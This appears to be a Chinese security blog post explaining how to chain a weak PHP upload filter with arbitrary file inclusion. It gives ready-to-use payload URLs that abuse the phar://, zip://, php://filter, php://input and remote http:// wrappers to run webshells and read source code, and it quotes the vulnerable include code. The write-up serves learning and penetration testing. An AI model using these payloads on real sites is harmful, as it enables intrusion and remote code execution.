php伪协议漏洞,php文件包含+伪协议+文件上传漏洞利用实例

最新推荐文章于 2023-11-16 18:50:21 发布
最新推荐文章于 2023-11-16 18:50:21 发布
阅读量451 收藏
点赞数
文章标签: php伪协议漏洞

1.上传文件过滤了后缀名和MIME类型,$_FILES['pic']['type']是由浏览器传输的文件类型决定,但是mime_content_type()是由php

内置方法判断文件类型;

支持文件类型为application/zip,支持上传zip压缩文件,后缀名还是要改成.jpg或.gif,上传后将该名为随机数字(1499394959).jpg格式

$name1=substr($name,-4);

if(($name1!==".gif") and ($name1!==".jpg"))

{

echo "";

exit;

}

if(mime_content_type($tmpName)!=="image/jpeg"&&mime_content_type($tmpName)!=="image/gif"&&mime_content_type($tmpName)!=="application/zip")

{

echo mime_content_type($tmpName);

echo "";

exit;

}

2.任意文件包含

$f = $_GET['f'];

include_once('sys/config.php');

include($f);

利用zip或phar伪协议读取压缩包中的文件

/about.php?f=phar://./images/1499394959.jpg/1.php

/about.php?f=zip://./images/1499394959.jpg%231.php

上传webshell完成

扩展:

php伪协议:

file:

// — 访问本地文件系统

http:

// — 访问 HTTP(s) 网址

ftp:

// — 访问 FTP(s) URLs

php:

// — 访问各个输入/输出流(I/O streams)

zlib:

// — 压缩流

data:

// — 数据(RFC 2397)

glob:

// — 查找匹配的文件路径模式

phar:

// — PHP 归档

ssh2:

// — Secure Shell 2

rar:

// — RAR

ogg:

// — 音频流

expect:

// — 处理交互式的流 读取页面源代码 /about.php?f=php://filter/convert.base64-encode/resource=index.php 以base64加密的形式读取页面源代码,然后在再对代码进行base64解密就可以得到源代码 当php配置allow_url_include和allow_url_fopen都为On的时候,可以对文件进行远程包含 例如:about.php?f=http://web/1.php 当allow_url_include为On,而allow_url_fopen为Off的是否,不可以直接远程包含文件,但是可以使用php://input、 php://stdin、 php://memory 和 php://temp等伪协议 例如about.php?f=php://input  post传输数据<?php phpinfo(); ?>

Dr.Truman
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
php判断文件上传图片格式的实例详解
12-19
在给定的实例中,我们看到一个简单的PHP代码片段用于检查上传文件的扩展名是否在允许的图片类型列表中。然而,这种方法存在一个漏洞,即用户可以通过更改文件的后缀名来绕过检查。为了更安全地判断图片格式,我们...
php伪协议使用示例
XiaoXiao_RenHe的专栏
03-31 413
文件包含漏洞利用php伪协议php://input 输入流,或本地包含,nginx的access.log写入一句话木马,蚁剑链接服务器成功。
WEB攻防-通用漏洞&文件包含&LFI&RFI&伪协议编码算法&代码审计
m0_65336233的博客
10-17 1329
WEB攻防-通用漏洞&文件包含&LFI&RFI&伪协议编码算法&代码审计
SSRF - ctfhub - 1【内网访问、伪协议读取、端口扫描、POST详解、上传文件】
bin789456的博客
11-18 2202
写在前面 ssrf无论是生活中还是比赛中都是一种非常常见的漏洞。但一般来说单独考察的较少。后面将从ctfhub和其他平台上来慢慢练习。 SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统) SSRF 形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与限
PHP伪协议利用
Echo__h的博客
04-24 328
PHP内置的URL风格的封装协议 其中,常用的主要有:php://filter php://input phar://在文件包含php文件时会自动执行,而无法读出其源码,使用php://filter可以对文件内容进行读取 读取的内容为b64编码格式,解码后即为文件源码此方法需要allow_url_include = 0n.php://打开文件流后,我们可以直接发送post写入恶意代码,即可执行主要用于在PHP中对压缩文件的读取。多用于配合文件上传漏洞使用例如将shell.txt压缩成zip格式后上传到服务器
【心得】PHP文件上传个人笔记
最新发布
uuzeray的博客
11-16 463
cgi.fix_pathinfo 默认开启 123.txt/123.php 当123.php不存在时,会找/前面的文件进行php解析,这时候,就成功解析了123.txt为php脚本了。使用专用图来生成jpg木马,实现经过二次渲染后,我们的恶意代码,依然能够保留在图片中,通过文件包含,执行里面的php代码。auto_append_file=123.txt 来让任意的php文件包含123.txt,执行里面的php代码。才可以使用,上传特定的svg图片,来实现组件的缺陷导致任意代码执行。
PHP文件数据类网站实例开发源码——Simple Directory Listing 文件管理系统.rar
10-24
**PHP文件数据类网站实例开发源码——Simple Directory Listing 文件管理系统** 这个压缩包包含的是一个基于PHP实现的简单目录列表(Simple Directory Listing)文件管理系统源码,版本为v2.1 beta1,简称SDL2。这...
PHP实例开发源码-FPS88 php文件上传管理系统.zip
10-15
FPS88 PHP文件上传管理系统是一个基于PHP编程语言的实例项目,旨在帮助开发者理解和学习如何实现一个功能完善的文件上传系统。这个系统可能包含了用户界面、文件处理逻辑、安全防护措施以及错误处理等多个方面,是...
PHP实例开发源码—Sanner-Inurlbr 利用搜索引擎来进行漏洞批量抓取.zip
11-23
PHP实例开发源码—Sanner-Inurlbr 利用搜索引擎来进行漏洞批量抓取】 PHP是一种广泛使用的开源脚本语言,特别适合于Web开发。在这个实例中,我们关注的是一个名为"Sanner-Inurlbr"的工具,它利用了搜索引擎的强大...
php包含漏洞源码
05-23
PHP包含漏洞是Web应用程序安全领域中的一个重要话题,它涉及到服务器端的编程错误,尤其是当开发者在PHP代码中不正确地处理文件包含时。这个压缩包可能包含了一个用于演示或研究PHP包含漏洞的源码实例PHP的文件...
PHP伪协议
qq_62604985的博客
07-10 1175
php伪协议,就是php支持的协议和封装协议file:// 访问本地文件系统php:// 访问各个输入/输出流data:// 数据zip:// 压缩流但是需要注意的是,当使用网络路径进行访问时,需要allow_url_fopen和allow_url_include都为ON。
php文件包含+伪协议+文件上传漏洞利用实例
热门推荐
Q1n6
07-12 1万+
1.上传文件过滤了后缀名和MIME类型,$_FILES['pic']['type']是由浏览器传输的文件类型决定,但是mime_content_type()是由php 内置方法判断文件类型;         支持文件类型为application/zip,支持上传zip压缩文件,后缀名还是要改成.jpg或.gif,上传后将该名为随机数字(1499394959).jpg格式 $name1=sub
php文件上传+文件包含(phar伪协议)
WFC1006848997的博客
11-22 5257
test.bugku-web-upload—文件上传文件包含组合 右键查看源码发现 继续查看源码,提示参数是file,还有一个upload.php 跟进upload.php,是个上传界面 那就可以猜测出是 文件上传文件包含的组合,所以直接先使用伪协议查看源码,使用的是php://filter协议 php://filter/convert.base64-encode/resource= 首先读取include.php的源码 发现后缀多了一个.php,所以就不加.php了 base64解码 &l
phar://、zip://伪协议进行shell上传
weixin_43749601的博客
06-18 1235
phar:// 环境:可上传png、jpg 首先写一个一句话木马shell.php接着压缩成zip文件。将后缀改为png文件进行上传,上传文件后使用shell工具进行连接。 http://localhost/?url=phar://uploads/63e93ffe53f03e93bb0a0249152d243874e31c9b.png/shell zip:// 环境:可上传png、zip 首先写一个一句话木马shell.php接着压缩成zip文件。直接上传zip文件,然后使用shell工具进行连接。 htt
文件上传】zip伪协议上传解析
serendipity1130的博客
08-29 1857
1.打开界面是登陆框,查看源码,发现有文件包含include($_GET['file']) 2.然后根据题目名称:文件上传,访问网址:/upload.php发现了文件上传点,先上传了jpg图片,发现不能用菜刀连接,应该是无法解析jpg。 3.因为有文件包含,所以考虑到使用伪协议包含木马图片的文件进行菜刀连接,因为都有过滤,最终尝试了zip伪协议可以进行访问。 4.方法:首先制作一句话木马的zip包,然后将后缀名改为jpg,进行上传,上传成功后复制图片地址,可以发现图片的地址为upload/2.jpg
关于http 文件上传的协议分析
qq_25794733的博客
06-16 1565
http上传文件抓包了解
文件包含-伪协议
孤的博客
10-02 8798
文件包含漏洞利用的前提 1.web 应用采用 include 等文件包含函数,并且需要包含的文件路径是通过用户传输参数的方式引入; 2.用户能够控制包含文件的参数,被包含的文件可被当前页面访问; 在使用文件包含漏洞时,必须要能知道其绝对路径 方法: 在包含文件处,查看其返回的错误的信息 伪协议文件包含 file:// 访问本地文件系统 http:// 访问 HTTPs 网址 ftp:// ...
文件上传/文件包含
qq_35533398的博客
09-08 888
文件上传 1、前端验证 如:检测 . 后的后缀名 绕过方式:burp进行抓包修改后缀 2、后端验证 (1)获取文件名,过滤php后缀 绕过方式1:.php4 .php5 .phtml php2, php3, php4, php5, phps, pht, phtm, phtml 绕过方式2:apache解析漏洞,从后向前知道可以识别的后缀,如 aaa.php.lyc (2)对文件MIME类型进行判断 比如:if ($_FILES["file"]["type"] != "image/jpeg
PHP代码审计入门指南1
08-04
除此之外,本指南还对常见的PHP漏洞进行了介绍,包括命令注入、代码注入、文件包含、SQL注入、文件操作、XSS、SSRF、CSRF、XXE、反序列化、LDAP注入等内容,帮助读者了解和识别不同类型的漏洞,提高审计能力。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值